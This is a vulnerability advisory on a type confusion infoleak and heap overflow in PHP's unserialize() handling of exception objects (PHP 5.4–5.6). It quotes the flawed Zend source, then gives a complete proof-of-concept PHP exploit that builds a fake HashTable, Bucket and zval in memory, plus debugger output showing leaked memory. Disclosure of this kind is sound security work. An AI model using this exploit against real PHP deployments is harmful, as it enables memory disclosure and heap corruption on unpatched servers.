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Type Confusion Infoleak and Heap Overflow Vulnerability in unserialize() with exception

Type Confusion Infoleak and Heap Overflow Vulnerability in unserialize() with exception

Taoguang Chen <@chtg> - Write Date: 2015.3.3 - Release Date: 2015.4.28

A type confusion vulnerability was discovered in exception object's __toString()/getTraceAsString() method that can be abused for leaking arbitrary memory blocks or heap overflow.

Affected Versions

Affected is PHP 5.6 < 5.6.8
Affected is PHP 5.5 < 5.5.24
Affected is PHP 5.4 < 5.4.40

Credits

This vulnerability was disclosed by Taoguang Chen.

Description

ZEND_METHOD(exception, getTraceAsString)
{
	zval *trace;
	char *res, **str, *s_tmp;
	int res_len = 0, *len = &res_len, num = 0;

	DEFAULT_0_PARAMS;
	
	res = estrdup("");
	str = &res;

	trace = zend_read_property(default_exception_ce, getThis(), "trace", sizeof("trace")-1, 1 TSRMLS_CC);
	zend_hash_apply_with_arguments(Z_ARRVAL_P(trace) TSRMLS_CC, (apply_func_args_t)_build_trace_string, 3, str, len, &num);

	...
	
static int _build_trace_string(zval **frame TSRMLS_DC, int num_args, va_list args, zend_hash_key *hash_key) /* {{{ */
{
	char *s_tmp, **str;
	int *len, *num;
	long line;
	HashTable *ht = Z_ARRVAL_PP(frame);
	zval **file, **tmp;
	
	...
	
	TRACE_APPEND_KEY("class");
	TRACE_APPEND_KEY("type");
	TRACE_APPEND_KEY("function");
	
	...

#define TRACE_APPEND_KEY(key)                                                   \
	if (zend_hash_find(ht, key, sizeof(key), (void**)&tmp) == SUCCESS) {    \
		if (Z_TYPE_PP(tmp) != IS_STRING) {                              \
			zend_error(E_WARNING, "Value for %s is no string", key); \
			TRACE_APPEND_STR("[unknown]");                          \
		} else {                                                        \
			TRACE_APPEND_STRL(Z_STRVAL_PP(tmp), Z_STRLEN_PP(tmp));  \
		}                                                               \
	}

The Z_ARRVAL_P macro leads to pointing a fake ZVAL in memory via a fake HashTable and a fake Bucket. So we can supply a fake sring-type ZVAL, and lookup arbitrary memory address via the Z_STRVAL_PP macro, causing a crash or an information leak.

#define TRACE_APPEND_STRL(val, vallen)                                   \
	{                                                                    \
		int l = vallen;                                                  \
		*str = (char*)erealloc(*str, *len + l + 1);                      \
		memcpy((*str) + *len, val, l);                                   \
		*len += l;                                                       \
	}

There is using signed integer arithmetic in erealloc(). The memcpy() function's third parameter is a unsiged integer. The vallen can be completely control and we can supply negative value via a fake string-type ZVAL. So we can assign a value to val which is larger than real allocated memory. The memcpy() will then copy more data than the heap-based buffers can hold, causing a heap-based buffer overflow.

Proof of Concept Exploit

The PoC works on standard MacOSX 10.10.3 installation of PHP 5.5.20.

<?php


ini_set("memory_limit", -1);

setup_memory();

$x = unserialize('O:9:"exception":1:{s:16:"'."\0".'Exception'."\0".'trace";s:'.strlen($hashtable).':"'.$hashtable.'";}');

echo $x, "\n";

function setup_memory()
{
	global $str, $hashtable;

	$base = 0x114000000 + 0x20;
	$bucket_addr = $base;
	$zval_delta = 0x100;
	$hashtable_delta = 0x200;
	$zval_addr = $base + $zval_delta;
	$hashtable_addr = $base + $hashtable_delta;

	$bucket  = "\x01\x00\x00\x00\x00\x00\x00\x00";
	$bucket .= "\x00\x00\x00\x00\x00\x00\x00\x00";
	$bucket .= ptr2str($bucket_addr + 3*8);
	$bucket .= ptr2str($zval_addr);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
  
	$bucket .= ptr2str(zhash('class'));
	$bucket .= "\x06\x00\x00\x00\x00\x00\x00\x00";
	$bucket .= ptr2str($bucket_addr + 3*8 + 9*8);
	$bucket .= ptr2str($zval_addr + 5*8 + 6);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str($zval_addr + 2*5*8 + 2*6);
	$bucket .= ptr2str($bucket_addr);
	$bucket .= ptr2str($bucket_addr + 9*8);

	$hashtable  = "\x00\x00\x00\x00";
	$hashtable .= "\x01\x00\x00\x00";
	$hashtable .= "\x03\x00\x00\x00";
	$hashtable .= "\x00\x00\x00\x00";
	$hashtable .= "\x00\x00\x00\x00\x00\x00\x00\x00";
	$hashtable .= ptr2str(0);
	$hashtable .= ptr2str($bucket_addr);
	$hashtable .= ptr2str($bucket_addr + 9*8);
	$hashtable .= ptr2str($bucket_addr + 18*8);
	$hashtable .= ptr2str(0);
	$hashtable .= "\x00";
	$hashtable .= "\x00";
  
	$zval = ptr2str($hashtable_addr);
	$zval .= ptr2str(0);
	$zval .= "\x00\x00\x00\x00";
	$zval .= "\x04";
	$zval .= "\x00";
	$zval .= ptr2str(0);
	$zval .= ptr2str(0);
	$zval .= ptr2str(0);
  
	$zval .= ptr2str(0x100352572);
	$zval .= ptr2str(0x16);
	$zval .= "\x00\x00\x00\x00";
	$zval .= "\x06";
	$zval .= "\x00";
	$zval .= ptr2str(0);
	$zval .= ptr2str(0);
	$zval .= ptr2str(0);
  
	$zval .= ptr2str(hexdec(bin2hex(strrev('class'))));
 
	$part = str_repeat("\x73", 4096);
	for ($j = 0; $j < strlen($bucket); $j++) {
		$part[$j] = $bucket[$j];
	}
	for ($j = 0; $j < strlen($hashtable); $j++) {
		$part[$j + $hashtable_delta] = $hashtable[$j];
	}
	for ($j = 0; $j < strlen($zval); $j++) {
		$part[$j + $zval_delta] = $zval[$j];
	}
	$str = str_repeat($part, 1024*1024*256/4096);
}

function ptr2str($ptr)
{
	$out = "";
	for ($i=0; $i<8; $i++) {
		$out .= chr($ptr & 0xff);
		$ptr >>= 8;
	}
	return $out;
}

function zhash($key)
{
	$hash = 5381;
	$key = $key;
	$len = strlen($key) + 1;
	
	for (; $len >= 8; $len -= 8) {
		for ($i = 0; $i < 8; $i++) {
			$hash = (($hash << 5) + $hash) + ord($key{$i});
        }
	}
	$key = substr($key, -$len);
	for ($i = 0; $i < $len; $i++) {
		$hash = (($hash << 5) + $hash) + ord($key{$i});
	}
	return $hash;
}

?>

Test the PoC on the command line, then output some memory blocks:

$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run tcpoc.php
Process 1825 launched: '/usr/bin/php' (x86_64)
exception 'Exception' in tcpoc.php:7
Stack trace:
#0 [internal function]: UH??AWAVSPI??I??H????()
#1 {main}
Process 1825 exited with status = 0 (0x00000000) 
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